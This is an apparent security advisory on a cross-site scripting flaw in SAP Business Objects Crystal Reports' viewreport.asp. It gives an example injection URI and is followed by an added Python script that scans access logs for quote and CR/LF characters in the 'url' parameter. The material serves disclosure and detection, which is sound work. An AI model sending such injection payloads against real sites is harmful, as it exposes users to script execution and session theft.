SAP Business Objects Crystal Reports 'viewreport.asp' Cross Site Scripting Vulnerability

An attacker can exploit this issue by enticing an unsuspecting victim to follow a malicious URI.

The following example URI is available:

https://www.example.com/some/path/viewreport.asp?url=viewrpt.cwr?ID=7777"%0d%0awindow.alert%20"fsck_cissp^^INIT=actx:connect
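A log-review check for the URI pattern shown above, as an added example that is not part of the original advisory: it flags requests to viewreport.asp whose `url` parameter decodes to contain a double quote, CR or LF, the characters present in the example URI. The access-log lines are constructed samples, the function names are hypothetical, and treating those three characters as the indicator is an assumption drawn from that one URI.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: these characters, seen in the advisory's example URI, never
# belong in a legitimate report reference passed through the `url` parameter.
SUSPICIOUS = {'"': "double-quote", "\r": "CR", "\n": "LF"}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (not taken from the advisory).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2010:10:00:00 +0000] "GET /some/path/viewreport.asp?url=viewrpt.cwr?ID=7777 HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2010:10:00:05 +0000] "GET /some/path/viewreport.asp?url=viewrpt.cwr?ID=7777%22%0d%0awindow.alert%20%22fsck_cissp^^INIT=actx:connect HTTP/1.1" 200 5340',
    '192.0.2.12 - - [01/Jan/2010:10:00:09 +0000] "GET /some/path/ViewReport.asp?URL=viewrpt.cwr?ID=1%250a HTTP/1.1" 200 5100',
]

def fully_decode(value, max_rounds=3):
    """Percent-decode repeatedly so double-encoded input (%250a) is also caught."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_request(target):
    """Return the sorted indicator names found in the `url` parameter."""
    parts = urlsplit(target)
    # Compare path and parameter name in lower case so case variants are not missed.
    if not parts.path.lower().endswith("/viewreport.asp"):
        return []
    reasons = set()
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() == "url":
            decoded = fully_decode(value)  # parse_qsl already decoded once
            reasons.update(lbl for ch, lbl in SUSPICIOUS.items() if ch in decoded)
    return sorted(reasons)

def scan_log(lines):
    """Return (line_number, indicators) for every flagged access-log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        reasons = check_request(match.group(1)) if match else []
        if reasons:
            hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    print(scan_log(SAMPLE_LOG))
```

The same `check_request` test can back a request filter in front of the application, rejecting any `url` value that decodes to one of these characters.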


 

Copyright 2010, SecurityFocus